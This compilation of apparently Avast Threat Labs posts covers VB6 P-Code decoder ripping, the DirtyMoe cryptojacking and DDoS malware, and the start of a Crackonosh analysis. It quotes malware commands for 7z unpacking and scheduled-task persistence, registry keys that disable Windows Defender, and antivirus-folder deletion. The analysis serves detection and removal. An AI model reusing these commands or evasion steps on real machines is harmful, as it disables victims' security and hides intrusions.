The following is taken from the early binding sample which loads the Sapi.SpVoice COM object. 

Generation of this code is generally automatic by VBDec but there may be times where the tool can not automatically detect which kind of const pool entry is being specified. In these cases you may have to manually explore the const pool and extract the data yourself.

In the above scenario the file data at the const pool address may look similar to the following:

If we visualize this as a COMDEF structure we can see the values 0, 0x401230, 0x401240, 0. Looking at the file offsets for these virtual addresses we find the GUIDs given above. 

String entries are held as BSTRs, which is a length prefixed unicode string. Since we are in complete control of the const pool, and BSTRs can encapsulate binary data. It is possible to include encrypted strings directly in the const pool using SysAllocStringByteLen. The binary_ConstPool* samples demonstrate this technique. You can also dynamically swap out const pool entries to change functionality as the P-Code runs. An example of this is found in the early bind sample. 

Note: It is important to use the SysAlloc* string functions to get real BSTR’s for const pool entries. As the strings get used by the runtime, it may try to realloc or release them.

Extended TLS Initialization

The VB6 runtime stores several key structures in Thread Local Storage (TLS). Several functions of the runtime require these structures to be initialized. These structures are critical for VB error handling routines and can also come into play for file access functions.

Below is the code for the rtcGetErl export. This function retrieves the user specified error line number associated with the last exception that occurred.

From this snippet of code we can see that the runtime stores the TLS slot value at offset 66110000. Once the actual memory address is retrieved with TlsGetValue The structure field 0x98 is then returned as the stored last error line number. In this manner we can begin to understand the meaning of the various structure offsets.

Even without a full analysis of the complete 0xA8 byte structure we can compare the values seen between a fully initialized process with those initialized through the CreateIExprSrvObj export.

Once diffed 2 main empty slots are observed which normally point to other allocations.

  • field 0x18 – normally set @ 66015B25 in EbSetContextWorkerThread
  • field 0x48 – normally set @ 66018081 in RegAppObjectOfProject

Field 0x48 is used for access to the internal VB App. COM object. This object does not make sense to use in our scenario and does not trigger any exceptions if left blank. If we had to replicate the COM object for compatibility with existing code we could however insert a dummy object.

The allocation at offset 0x18 is only required if we wish to use built in VB file operation commands or the MsgBox function.

If demanded for compatibility with ripped code, It was interesting to see if a manual allocation would allow the runtime to operate properly.

The following code was created to dynamically lookup the TLS slot value, retrieve the tlsEbthread memory offset and then manually link in a new allocation to the missing 0x18 field.

Once the above code was integrated full access was restored to the native VB file access functions. Again this extended initialization is not always required.

Debugging integration’s 

When testing this technique it is best to start with your own code that you control. This way you can get familiar with it and develop a feel for working with (and recognizing) the different function prototypes.

The first step is to write and debug your VB6 code as normal in the VB6 IDE. In preparation for running as a byte buffer, you can then pepper the VB code with progress callbacks to API Declare routines which normally access C dll exports.. You don’t actually have to write the dll, but you can. The calls are identical when hosted internally from a native C loader (or even a VB hosted Addressof callback routine). 

If you are calling into a P-Code function with a specific prototype, this is the trickiest part of the integration. Samples are available which pass in int, structures, references, Variants, bools and byte arrays. You will have to be very aware if arguments are being passed in ByVal, or the default ByRef (pointers).

Also pay attention to the function return types. If no argument/return type is defined, it defaults to a COM Variant. VB functions receive variant return values by pushing an extra empty one onto the stack before calling the function. Simple numeric return values are passed back in EAX as normal.

When interacting with callbacks make sure the callbacks are defined as __stdcall. All of the standard VB6 <–> C development knowledge applies. You can cut your teeth on these rules by working with standard C dlls and debugging in Visual Studio from the dll side while launching a VB6 exe host.

When in doubt you can create simple tests to debug just the function prototypes. For the complex prototype decryptor sample given above, I had the VB6 sub main() code call the rc4 function with expected parameters to test it in its natural environment. I could then debug the VB6 executable to watch the exact stack parameters passed to develop more insight into how to replicate it manually from my C loader.

This can be done with a native debugger by setting a breakpoint @6610664E on the ImpAdCallFPR4 handler in the VB runtime. Here you could examine the stack before entry into the target P-Code function. VBDec’s P-Code debugger is also convenient for this task.

When debugging it is best to have the reference copy of the VB runtime in the same directory as the target executable so that all of your offsets line up with your runtime disassembly with debug symbols. If you use IDA as your debugger, start with the disassembly of the VB runtime and set the target executable in the debugger options. Asm focused debuggers such as Olly or x64dbg are highly recommended over Visual Studio which is primarily based around source code debugging. 


When working on malware analysis it is a common task to have to interoperate with various types of custom decoding routines. There are multiple approaches to this. One can sit down and reverse engineer the entire routine and make sure your code is 100% compatible, or you can try to explore rip based techniques. 

Ripping decoders is a fairly common task in my personal playbook. While researching the internals of the VB runtime it was a natural inquiry for me to see if the same concept could be applied to P-Code functions. 

With some experimentation, and a suitable generator, this technique has proven stable and relatively easy to implement. These experiments have also deepened my insights into how the various structures are used by the runtime and my appreciation for how tightly VB6 can integrate with C code. 

Hopefully this information will give you a new arrow to add to your quiver, or at least have been an interesting ride. 

[1] Emit based rip
[2] Using an exe as a dll
[3] Running byte blobs in scdbg
[4] Malware IPC decoder service
[5] Code samples
[6] VB6 runtime with symbols
[7] VB6 internals video
[8] VBDec P-Code Debugger

The post Binary Reuse of VB6 P-Code Functions appeared first on Avast Threat Labs.

DirtyMoe: Introduction and General Overview of Modularized Malware

16 June 2021 at 11:56


The rising price of the cryptocurrency has caused a skyrocketing trend of malware samples in the wild. DDoS attacks go hand in hand with the mining of cryptocurrencies to increase the attackers’ revenue/profitability. Moreover, the temptation grows if you have thousands of victims at your disposal.

This article presents the result of our recent research on the DirtyMoe malware. We noticed that the NuggetPhantom malware [1] had been the first version of DirtyMoe, and PurpleFox is its exploit kit [2]. We date the first mention of the malware to 2016. The malware has followed a  fascinating evolution during the last few years. The first samples were often unstable and produced obvious symptoms. Nonetheless, the current samples are at par with other malware in the use of anti-forensic, anti-tracking, and anti-debugging techniques nowadays.

The DirtyMoe malware uses a simple idea of how to be modularized, undetectable, and untrackable at the same time. The aim of this malware is focused on Cryptojacking and DDoS attacks. DirtyMoe is run as a Windows service under system-level privileges via EternalBlue and at least three other exploits. The particular functionality is controlled remotely by the malware authors who can reconfigure thousands of DirtyMoe instances to the desired functionality within a few hours. DirtyMoe just downloads an encrypted payload, corresponding to the required functionality, and injects the payload into itself.

DirtyMoe’s self-defense and hiding techniques can be found at local and network malware layers. The core of the DirtyMoe is the service that is protected by VMProtect. It extracts a Windows driver that utilizes various rootkit capabilities such as service, registry entry, and driver hiding. Additionally, the driver can hide selected files on the system volume and can inject an arbitrary DLL into each newly created process in the system. The network communication with a mother server is not hard-coded and is not invoked directly. DirtyMoe makes a DNS request to one hard-coded domain using a set of hardcoded DNS servers. However,  the final IP address and port are derived using another sequence of DNS requests. So, blocking one final IP address does not neutralize the malware, and we also cannot block DNS requests to DNS servers such as Google, Cloudflare, etc.

This is the first article of the DirtyMoe series. We present a high-level overview of the complex DirtyMoe’s architecture in this article. The following articles will be focused on detailed aspects of the DirtyMoe architecture, such as the driver, services, modules, etc. In this article, We describe DirtyMoe’s kill chain, sophisticated network communication, self-protecting techniques, and significant symptoms. Further, we present statistical information about the prevalence and location of the malware and C&C servers. Finally, we discuss and summarize the relationship between DirtyMoe and PurpleFox. Indicators of Compromise lists will be published in future posts for each malware component.

1. Kill Chain

The following Figures illustrate two views of DirtyMoe architecture. The first one is delivery and the second one is exploration including installation. Individual Kill Chain items are described in the following subsections.

Figure 1. Kill Chain: Delivery
Figure 2. Kill Chain: Exploitation and Installation

1.2 Reconnaissance

Through port-scanning and open-database of vulnerabilities, the attackers find and target a large number of weak computers. PurpleFox is the commonly used exploit kit for DirtyMoe.

1.3 Weaponization

The DirtyMoe authors apply several explicit techniques to gain admin privileges for a DirtyMoe deployment.

One of the favorite exploits is EternalBlue (CVE-2017-0144), although this vulnerability is well known from 2017. Avast still blocks around 20 million EternalBlue attack attempts every month. Unfortunately, a million machines still operate with the vulnerable SMBv1 protocol and hence opening doors to malware include DirtyMoe via privilege escalation [3]. Recently, a new infection vector that cracks Windows machines through SMB password brute force is on the rise [2].

Another way to infect a victim machine with DirtyMoe is phishing emails containing URLs that can exploit targets via Internet Explorer; for instance, the Scripting Engine Memory Corruption Vulnerability (CVE-2020-0674). The vulnerability can inject and damage memory so that executed code is run in the current user context. So, if the attacker is lucky enough to administrator user login, the code takes control over the affected machine [4]. It is wondering how many users frequently use Internet Explorer with this vulnerability.

Further, a wide range of infected files is a way to deploy DirtyMoe. Crack, Keygen, but even legit-looking applications could consist of malicious code that installs malware into victim machines as a part of their execution process. Customarily, the malware installation is done in the background and silently without user interaction or user’s knowledge. Infected macros, self-extracting archive, and repacked installers of popular applications are the typical groups.

We have given the most well-known examples above, but how to deploy malware is unlimited. All ways have one thing in common; it is Common Vulnerabilities and Exposures (CVE). Description of the exact method to install DirtyMoe is out of this article’s scope. However, we list a shortlist of used CVE for DirtyMoe as follows:

  • CVE-2019-1458, CVE-2015-1701, CVE-2018-8120: Win32k Elevation of Privilege Vulnerability
  • CVE-2014-6332: Windows OLE Automation Array Remote Code Execution Vulnerability

1.4 Delivery

When one of the exploits is successful and gains system privileges, DirtyMoe can be installed on a victim’s machine. We observe that DirtyMoe utilizes Windows MSI Installer to deploy the malware. MSI Installer provides an easy way to install proper software across several platforms and versions of Windows. Each version requires a different location of installed files and registry entries. The malware author can comfortably set up DirtyMoe configurations for the target system and platform.

1.4.1 MSI Installer Package

The malware authors via MSI installer prepare a victim environment to a proper state. They focus on disabling anti-spyware and file protection features. Additionally, the MSI package uses one system feature which helps to overwrite system files for malware deployment.

Registry Manipulation

There are several registry manipulations during MSI installation. The most crucial registry entries are described in the following overview:

  • Microsoft Defender Antivirus can be disabled by the DisableAntiSpyware registry key set to 1.
    • HKCU\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
  • Windows File Protection (WFP) of critical Windows system files is disabled.
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan
  • Disables SMB sharing due to the prevention of another malware infection
    • HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\SMBDeviceEnabled
  • Replacing system files by the malware ones
    • HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AllowProtectedRenames
    • HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations
  • Sets the threshold to the maximum value to ensure that each service is run as a thread and the service is not a normal process.
    • HKLM\SYSTEM\CurrentControlSet\Control\SvcHostSplitThresholdInKB

File Manipulation

The MSI installer copies files to defined destinations if an appropriate condition is met, as the following table summarizes.

File Destination Condition
sysupdate.log WindowsFolder Always
winupdate32.log WindowsFolder NOT VersionNT64
winupdate64.log WindowsFolder VersionNT64

Windows Session Manager (smss.exe) copies the files during Windows startup according to registry value of PendingFileRenameOperations entry as follows:

  • Delete (if exist) \\[WindowsFolder]\\AppPatch\\Acpsens.dll
  • Move \\[SystemFolder]\\sens.dll to \\[WindowsFolder]\\AppPatch\\Acpsens.dll
  • Move \\[WindowsFolder]\\winupdate[64,32].log to \\[SystemFolder]\\sens.dll
  • Delete (if exist) \\[WindowsFolder]\\AppPatch\\Ke583427.xsl
  • Move \\[WindowsFolder]\\sysupdate.log to \\[WindowsFolder]\\AppPatch\\Ke583427.xsl

1.4.2 MSI Installation

The MSI installer can be run silently without the necessity of the user interaction. The installation requires the system restart to apply all changes, but the MSI installer supports delayed restart, and a user does not detect any suspicious symptoms. The MSI installer prepares all necessary files and configurations to deploy the DirtyMoe malware. After the system reboot, the system overwrites defined system files, and the malware is run. We will describe the detailed analysis of the MSI package in a separate article.

1.5 Exploitation

The MSI package overwrites the system file sens.dll via the Windows Session Manager. Therefore, DirtyMoe abuses the Windows System Event Notification (SENS) to be started by the system. The infected SENS Service is a mediator which deploys a DirtyMoe Service.

In the first phase, the abused service ensures that DirtyMoe will be loaded after the system reboot and restores the misused Windows service to the original state. Secondly, the main DirtyMoe service is started, and a rootkit driver hides the DirtyMoe’s services, registry entries, and files.

1.5.1 Infected SENS Service

Windows runs the original SENS under NT AUTHORITY\SYSTEM user. So, DirtyMoe gains system-level privileges. DirtyMoe must complete three basic objectives on the first run of the infected SENS Service.

  1. Rootkit Driver Loading
    DirtyMoe runs in user mode, but the malware needs support from the kernel space. Most kernel actions try to hide or anti-track DirtyMoe activities. A driver binary is embedded in the DirtyMoe service that loads the driver during DirtyMoe starts.
  2. DirtyMoe Service Registration
    The infected SENS Service registers the DirtyMoe Service in the system as a regular Windows service. Consequently, the DirtyMoe malware can survive the system reboot. The DirtyMoe driver is activated at this time; hence the newly created service is hidden too. DirtyMoe Service is the main executive unit that maintains all malware activities.
  3. System Event Notification Service Recovery
    If the DirtyMoe installation and service deployment is successful, the last step of the infected SENS Service is to recover the original SENS service from the Acpsens.dll backup file; see File Manipulation.

1.5.2 DirtyMoe Service

DirtyMoe Service is registered in the system during the maware’s deployment. At the start, the service extracts and loads the DirtyMoe driver to protect itself. When the driver is loaded, the service cleans up all evidence about the driver from the file system and registry.

The DirtyMoe malware is composed of two processes, namely DirtyMoe Core and DirtyMoe Executioner, created by DirtyMoe service that terminates itself if the processes are created and configured. DirtyMoe Service creates the Core and Executioner process through several processes and threads that are terminated over time. Forensic and tracking methods are therefore more difficult. The DirtyMoe services, processes, and their details will be described in the future article in detail.

1.6 Installation

All we described above is only preparation for malicious execution. DirtyMoe Core is the maintenance process that manages downloading, updating, encrypting, backuping, and protecting DirtyMoe malware. DirtyMoe Core is responsible for the injection of malicious code into DirtyMoe Executioner that executes it. The injected code, called MOE Object or Module, is downloaded from a C&C server. MOE Objects are encrypted PE files that DirtyMoe Core decrypts and injects into DirtyMoe Executioner.

Additionally, the initial payload that determines the introductory behavior of DirtyMoe Core is deployed by the MSI Installer as the sysupdate.log file. Therefore, DirtyMoe Core can update or change its own functionality by payload injection.

1.7 Command and Control

DirtyMoe Core and DirtyMoe Executioner provide an interface for the malware authors who can modularize DirtyMoe remotely and change the purpose and configuration via MOE Objects. DirtyMoe Core communicates with the command and control (C&C) server to obtain attacker commands. Accordingly, the whole complex hierarchy is highly modularized and is very flexible to configuration and control.

The insidiousness of the C&C communication is that DirtyMoe does not use fixed IP addresses but implements a unique mechanism to obfuscate the final C&C server address. So, it is impossible to block the C&C server on a victim’s machine since the server address is different for each C&C communication. Moreover, the mechanism is based on DNS requests which cannot be easily blocked because it would affect everyday communications.

1.8 Actions on Objective

Regarding DirtyMoe modularization, crypto-mining seems to be a continuous activity that uses victim machines permanently if malware authors do not need to make targeted attacks. So, crypto-mining is an activity at a time of peace. However, the NSFOCUS Threat Intelligence center discovered distributed denial-of-service (DDoS) attacks [1]. In general, DirtyMoe can deploy arbitrary malware into infected systems, such as information stealer, ransomware, trojan, etc.

2. Network Communication

As we announced, the network communication with the C&C server is sophisticated. The IP address of the C&C server is not hardcoded because it is derived from DNS requests. There are three pieces of information hardcoded in the code.

  1. A list of public DNS servers such as Google, Cloudflare, etc.
  2. A hard-coded domain rpc[.]1qw[.]us is an entry point to get the final IP address of the C&C server.
  3. Bulgarian constants1) that are used for a translation of IP addresses.

A DNS request to the 1qw[.]us domain returns a list of live servers, but it is not the final C&C server. DirtyMoe converts the returned IP address to integer and subtracts the first Bulgarian constant (anything making the result correct) to calculate the final C&C IP address. A C&C port is also derived from the final IP address using the second Bulgarian’s constant to make things even worse.

The insidiousness of the translation is an application of DNS requests that cannot be easily blocked because users need the IP translations. DirtyMoe sends requests to public DNS servers that resolve the 1qw[.]us domain recursively. Therefore, user machines do not contact the malicious domain directly but via one of the hardcoded domain name servers. Moreover, the list of returned IP addresses is different for each minute. 

We record approx. 2,000 IP addresses to date. Many translated IP addresses lead to live web servers, mostly with Chinese content. It is unclear whether the malware author owns the web servers or the web servers are just compromised by DirtyMoe.

3. Statistics

According to our observation, the first significant occurrence of DirtyMoe was observed in 2017. The number of DirtyMoe hits was in the thousands between 2018 – 2020.

3.1 DirtyMoe Hits

The increase of incidences has been higher in orders of magnitude this year, as the logarithmic scale of Figure 3 indicates. On the other hand, it must be noted that we have improved our detection for DirtyMoe in 2020. We record approx. one hundred thousand infected and active machines to date. However, it is evident that DirtyMoe malware is still active and on the rise. Therefore, we will have to watch out and stay sharp.

Figure 3. Annual occurrences of DirtyMoe hits

The dominant county of DirtyMoe hits is Russia; specifically, 65 k of 245 k hits; see Figure 4. DirtyMoe leads in Europe and Asia, as Figure 5 illustrates. America also has a significant share of hits.

Figure 4. Distribution of hits in point of the country view
Figure 5. Distribution of hits in point of the continent view

3.2 C&C Servers

We observed the different distribution of countries and continents for C&C servers (IP addresses) and sample hits. Most of the C&C servers are located in China, as Figures 6 and 7 demonstrate. We can deduce that the location of the malware source is in China. It is evident that the malware authors are a well-organized group that operates on all major continents.

Figure 6. Distribution of C&C servers in point of the country view
Figure 7. Distribution of C&C servers in point of the continent view

3.3 VMProtect

In the last two years, DirtyMoe has used a volume ID of the victim’s machines as a name for the service DLL. The first versions of DirtyMoe applied a windows service name selected at random. It was dominant in 2018; see Figure 8.

Figure 8. Distribution of cases using service names

We detected the first significant occurrence of VMProtect at the end of 2018. The obfuscation via VMprotect has been continuously observed since 2019. Before VMProtect, the malware authors relied on common obfuscation methods that are still present in the VMProtected versions of DirtyMoe.

4. Self Protecting Techniques

Every good malware must implement a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. DirtyMoe uses rootkit methods to hide system activities. Obfuscation is implemented via the VMProtect software and via its own encrypting/decrypting algorithm. Network communications are utilized by a multilevel architecture so that no IP addresses of the mother servers are hardcoded. Last but not least is the protection of DirtyMoe processes to each other.

4.1 DirtyMoe Driver

 The DirtyMoe driver provides a wide scale of functionality; see the following shortlist:

  • Minifilter: affection (hide, insert, modify) of a directory enumeration
  • Registry Hiding: can hide defined registry keys
  • Service Hiding: patches service.exe structures to hide a required service
  • Driver Hiding: can hide itself in the system

The DirtyMoe driver is a broad topic that we will discuss in a future post.

4.2 Obfuscation and VMProtect

DirtyMoe code contains many malicious patterns that would be caught by most AV. The malware author used VMprotect to obfuscate the DirtyMoe Service DLL file. DirtyMoe Objects that download are encrypted with symmetric ciphers using hardcoded keys. We have seen several MOE objects which contained, in essence, the same PE files differing in PE headers only. Nevertheless, even these slight modifications were enough for the used cipher to produce completely different MOE objects. Therefore, static detections cannot be applied to MOE encrypted objects. Moreover, DirtyMoe does not dump a decrypted MOE object (PE file) into the file system but directly injects the MOE object into the memory.

DirtyMoe stores its configuration in registry entry as follows: HKLM\SOFTWARE\Microsoft\DirectPlay8\Direct3D

The configuration values are also encrypted by the symmetric cipher and hardcoded key. Figure 9 demonstrates the decryption method for the DirectPlay8\Direct3D registry key. A detailed explanation of the method will be published in a future post.

Figure 9. Decryption method for the Direct3D registry value

4.3 Anti-Forensic and Protections

As we mentioned in the Exploitation section, the forensic and tracking methods are more complicated since DirtyMoe workers are started over several processes and threads. The workers are initially run as svchost.exe, but the DirtyMoe driver changes the worker’s process names to fontdrvhost.exe. DirtyMoe has two worker processes (Core and Executioner) that are guarded to each other. So, if the first worker is killed, the second one starts a new instance of the first one and vice versa.

5. Symptoms and Deactivation

Although DirtyMoe uses advanced protection and anti-forensics techniques, several symptoms indicate the presence of DirtyMoe.

5.1 Registry

The marked indicator of DrityMoe existence is a registry key HKLM\SOFTWARE\Microsoft\DirectPlay8\Direct3D.
The DirtyMoe stores the configuration in this registry key.

Additionally, if the system registry contains duplicate keys in the path HKLM\SYSTEM\CurrentControlSet\Services, it can point to unauthorized manipulation in the Windows kernel structures. The DirtyMoe driver implements techniques to hide registry keys that can cause inconsistency in the registry.

The MSI installer leaves the following flag if the installation is successful:

5.2 Files

The working directory of DirtyMoe is C:\Windows\AppPatch. The DirtyMoe malware backups the original SENS DLL file to the working directory under the Acpsens.dll file.

Rarely, the DirtyMoe worker fails during .moe file injection, and the C:\Windows\AppPatch\Custom folder may contain unprocessed MOE files.

Sometimes, DirtyMoe “forgot” to delete a temporary DLL file used for the malware deployment. The temporary service is present in Windows services, and the service name pattern is ms<five-digit_random_number>app. So, the System32 folder can contain the DLL file in the form: C:\Windows\System32\ms<five-digit-random-number>app.dll

The MSI installer often creates a directory in C:\Program Files folder with the name of the MSI product name:

5.3 Processes

On Windows 10, the DirtyMoe processes have no live parent process since the parent is killed due to anti-tracking. The workers are based on svchost.exe. Nonetheless, the processes are visible as fontdrvhost.exe under SYSTEM users with the following command-line arguments:

svchost.exe -k LocalService
svchost.exe -k NetworkService

5.4 Deactivation

It is necessary to stop or delete the DirtyMoe service named Ms<volume-id>App. Unfortunately, the DirtyMoe driver hides the service even in the safe mode. So, the system should be started via any installation disk to avoid the driver effect and then remove/rename the service DLL file located in C:\Windows\System32\Ms<volume-id>App.dll.

Then, the DirtyMoe service is not started, and the following action can be taken:

  • Remove Ms<volume-id>App service
  • Delete the service DLL file
  • Remove the core payload and their backup files from C:\Windows\AppPatch
    • Ke<five-digit_random_number>.xsl and Ac<volume-id>.sdb
  • Remove DirtyMoe Objects from C:\Windows\AppPatch\Custom
    • <md5>.mos; <md5>.moe; <md5>.mow

6. Discussion

Parts of the DirtyMoe malware have been seen throughout the last four years. Most notably, NSFOCUS Technologies described these parts as Nugget Phantom [1]. However, DirtyMoe needs some exploit kit for its deployment. We have clues that PurpleFox [5] and DirtyMoe are related together. The question is still whether PurpleFox and DirtyMoe are different malware groups or whether PurpleFox is being paid to distribute DirtyMoe. Otherwise, both malware families come from the same factory. Both have complex and sophisticated network infrastructures. Hence, malware could be a work of the same group.

The DirtyMoe authors are probably from China. The DirtyMoe service and MOE Modules are written in Delphi. On the other hand, the DirtyMoe driver is written in Microsoft Visual C++. However, the driver is composed of rootkit techniques that are freely accessible on the internet. The authors are not familiar with rootkit writing since the drive code contains many bugs that have been copied from the internet. Moreover, Delphi malicious patterns would be easily detectable, so the authors have been using VMProtect for the code obfuscation.

The incidence of PurpleFox and DirtyMoe has increased in the last year by order of magnitude, and expected occurrence indicates that DirtyMoe is and will be very active. Furthermore, the malware authors seem to be a large and organized group. Therefore, DirtyMoe should be closely monitored.

7. Conclusion

Cryptojacking and DDoS attacks are still popular methods, and our findings indicate that DirtyMoe is still active and on the rise. DirtyMoe is a complex malware that has been designed as a modular system. PurpleFox is one of the most used exploit kits for DirtyMoe deployment. DirtyMoe can execute arbitrary functionality based on a loaded MOE object such as DDoS, etc., meaning that it can basically do anything. In the meantime, the malware aims at crypto-mining. 

The malware implements many self-defense and hiding techniques applied on local, network, and kernel layers. Communication with C&C servers is based on DNS requests and it uses a special mechanism translating DNS results to a real IP address. Therefore, blocking of C&C servers is not an easy task since C&C addresses are different each time and they are not hard-coded. 

Both PurpleFox and DirtyMoe are still active malware and gaining strength. Attacks performed by PurpleFox have significantly increased in 2020. Similarly, the number of DirtyMoe hits also increases since both malware are clearly linked together. We have registered approx. 100k infected computers to date.  In each case, DirtyMoe and Purple Fox are still active in the wild. Furthermore, one MOE object aims to worm into other machines, so PurpleFox and DirtyMoe will certainly increase their activity. Therefore, both should be closely monitored for the time being.

This article summarizes the DirtyMoe malware in point of high-level overview. We described deploying, installation, purpose, communication, self-protecting, and statistics of DirtyMoe in general. The following articles of the DirtyMoe series will aim to give a detailed description of the MSI installer package, DirtyMoe driver, services, MOE objects, and other interesting topics related to the whole DirtyMoe architecture.


[1] Nugget Phantom Analysis
[2] Purple Fox Rootkit Now Propagates as a Worm
[3] EternalBlue Still Relevant
[4] Scripting Engine Memory Corruption Vulnerability
[5] Purple Fox malware

The post DirtyMoe: Introduction and General Overview of Modularized Malware appeared first on Avast Threat Labs.

Crackonosh: A New Malware Distributed in Cracked Software

24 June 2021 at 09:39

We recently became aware of customer reports advising that Avast antivirus was missing from their systems – like the following example from Reddit.

From Reddit

We looked into this report and others like it and have found a new malware we’re calling “Crackonosh” in part because of some possible indications that the malware author may be Czech. Crackonosh is distributed along with illegal, cracked copies of popular software and searches for and disables many popular antivirus programs as part of its anti-detection and anti-forensics tactics.

In this posting we analyze Crackonosh. We look first at how Crackonosh is installed. In our analysis we found that it drops three key files winrmsrv.exe, winscomrssrv.dll and winlogui.exe which we analyze below. We also include information on the steps it takes to disable Windows Defender and Windows Update as well as anti-detection and anti-forensics actions. We include information on how to remove Crackonosh. Finally, we include indicators of compromise for Crackonosh.

Number of hits since December 2020. In total over 222,000 unique devices.
Number of users infected by Crackonosh since December 2020. In May it is still about a thousand hits every day.

The main target of Crackonosh was the installation of the coinminer XMRig, from all the wallets we found, there was one where we were able to find statistics. The pool sites showed payments of 9000 XMR in total, that is with today prices over $2,000,000 USD.

Statistics from
Statistics from MoneroHash

Installation of Crackonosh

The diagram below depicts the entire Crackonosh installation process.

Diagram of installation
  1. First, the victim runs the installer for the cracked software.
  2. The installer runs maintenance.vbs
  3. Maintenance.vbs then starts the installation using serviceinstaller.msi
  4. Serviceinstaller.msi registers and runs serviceinstaller.exe, the main malware executable.
  5. Serviceintaller.exe drops StartupCheckLibrary.DLL.
  6. StartupCheckLibrary.DLL downloads and runs wksprtcli.dll.
  7. Wksprtcli.dll extracts newer winlogui.exe and drops winscomrssrv.dll and winrmsrv.exe which it contains, decrypts and places in the folder.

From the original compilation date of Crackonosh we identified 30 different versions of serviceinstaller.exe, the main malware executable, from 31.1.2018 up to 23.11.2020. It is easy to find out that serviceinstaller.exe is started from a registry key created by Maintenance.vbs

The only clue to what happened before the Maintenance.vbs creates this registry key and how the files appear on the computer of the victim is the removal of InstallWinSAT task in maintenance.vbs. Hunting led us to uncover uninstallation logs containing Crackonosh unpacking details when installed with cracked software.

The following strings were found in uninstallation logs:

  • {sys}\7z.exe
  • -ir!*.*? e -pflk45DFTBplsd -y "{app}\base_cfg3.scs" -o{sys}
  • -ir!*.*? e -pflk45DFTBplsd -y "{app}\base_cfg4.scs" -o{localappdata}\Programs\Common
  • /Create /SC ONLOGON /TN "Microsoft\Windows\Maintenance\InstallWinSAT" /TR Maintenance.vbs /RL HIGHEST /F
  • /Create /SC ONLOGON /TN "Microsoft\Windows\Application Experience\StartupCheckLibrary" /TR StartupCheck.vbs /RL HIGHEST /F

This shows us that Crackonosh was packed in a password protected archive and unpacked in the process of installation. Here are infected installers we found:

Name of infected installer SHA256
NBA 2K19 E497EE189E16CAEF7C881C1C311D994AE75695C5087D09051BE59B0F0051A6CF
Grand Theft Auto V 65F39206FE7B706DED5D7A2DB74E900D4FAE539421C3167233139B5B5E125B8A
Far Cry 5 4B01A9C1C7F0AF74AA1DA11F8BB3FC8ECC3719C2C6F4AD820B31108923AC7B71
The Sims 4 Seasons 7F836B445D979870172FA108A47BA953B0C02D2076CAC22A5953EB05A683EDD4
Euro Truck Simulator 2 93A3B50069C463B1158A9BB3A8E3EDF9767E8F412C1140903B9FE674D81E32F0
The Sims 4 9EC3DE9BB9462821B5D034D43A9A5DE0715FF741E0C171ADFD7697134B936FA3
Jurassic World Evolution D8C092DE1BF9B355E9799105B146BAAB8C77C4449EAD2BDC4A5875769BB3FB8A
Fallout 4 GOTY 6A3C8A3CA0376E295A2A9005DFBA0EB55D37D5B7BF8FCF108F4FFF7778F47584
Call of Cthulhu D7A9BF98ACA2913699B234219FF8FDAA0F635E5DD3754B23D03D5C3441D94BFB
Pro Evolution Soccer 2018 8C52E5CC07710BF7F8B51B075D9F25CD2ECE58FD11D2944C6AB9BF62B7FBFA05
We Happy Few C6817D6AFECDB89485887C0EE2B7AC84E4180323284E53994EF70B89C77768E1
Infected installers

The installer Inno Setup executes the following script. If it finds it’s “safe” to run malware, then installs the Crackonosh malware to %SystemRoot%\system32\ and one configuration file to %localappdata%\Programs\Common and creates in the Windows Task scheduler the tasks InstallWinSAT to start maintenance.vbs and StartupCheckLibrary to start StartupcheckLibrary.vbs. Otherwise it does nothing at all.

Reconstructed Crackonosh Inno Setup installer script

Installation script

Analysis of Maintenance.vbs

As noted before, the Crackonosh installer registerers the maintenance.vbs script with the Windows Task Manager and sets it to run on system startup. The Maintenance.vbs creates a counter, that counts system startups until it reaches the 7th or 10th system start, depending on the version. After that the Maintenance.vbs runs serviceinstaller.msi, disables hibernation mode on the infected system and sets the system to boot to safe mode on the next restart. To cover its tracks it also deletes serviceinstaller.msi and maintenance.vbs.

Below is the maintenance.vbs script:


Serviceinstaller.msi does not manipulate any files on the system, it only modifies the registry to register serviceinstaller.exe, the main malware executable, as a service and allows it to run in safe mode. Below you can see the registry entries serviceinstaller.msi makes.

MSI Viewer screenshot of serviceinstaller.msi

Using Safe Mode to Disable Windows Defender and Antivirus

While the Windows system is in safe mode antivirus software doesn’t work. This can enable the malicious Serviceinstaller.exe to easily disable and delete Windows Defender. It also uses WQL to query all antivirus software installed SELECT * FROM AntiVirusProduct. If it finds any of the following antivirus products it deletes them with rd <AV directory> /s /q command where <AV directory> is the default directory name the specific antivirus product uses. 

  • Adaware
  • Bitdefender
  • Escan
  • F-secure
  • Kaspersky
  • Mcafee (scanner only)
  • Norton
  • Panda

It has names of folders, where they are installed and finally it deletes %PUBLIC%\Desktop\.

Older versions of serviceinstaller.exe used pathToSignedProductExe to obtain the containing folder. This folder was then deleted. This way Crackonosh could delete older versions of Avast or current versions with Self-Defense turned off.

It also drops StartupCheckLibrary.dll and winlogui.exe to %SystemRoot%\system32\ folder.

In older versions of serviceinstaller.exe it drops windfn.exe which is responsible for dropping and executing winlogui.exe. Winlogui.exe contains coinminer XMRig and in newer versions the serviceinstaller drops winlogui and creates the following registry entry:

This connects the infected PC to the mining pool on every start.

Disabling Windows Defender and Windows Update

It deletes following registry entries to stop Windows Defender and turn off automatic updates.

commands executed by serviceinstaller.exe

In the place of Windows Defender it installs its own MSASCuiL.exe which puts the icon of Windows Security to the system tray. 

It has the right icon
Deleted Defender

Searching for Configuration Files 

Looking at winrmsrv.exe (aaf2770f78a3d3ec237ca14e0cb20f4a05273ead04169342ddb989431c537e83) behavior showed something interesting in its API calls. There were over a thousand calls of FindFirstFileExW and FindNextFileExW. We looked at what file it was looking for, unfortunately the author of malware hid the name of the file behind an SHA256 hash as shown below.

In this image, you see the function searching for a file by hash of file name from winrmsrv.exe. Some nodes are grouped for better readability.

This technique was used in other parts of Crackonosh, sometimes with SHA1. 

Here is a list of searched hashes and corresponding names and paths. In the case of UserAccountControlSettingsDevice.dat the search is also done recursively in all subfolders. 

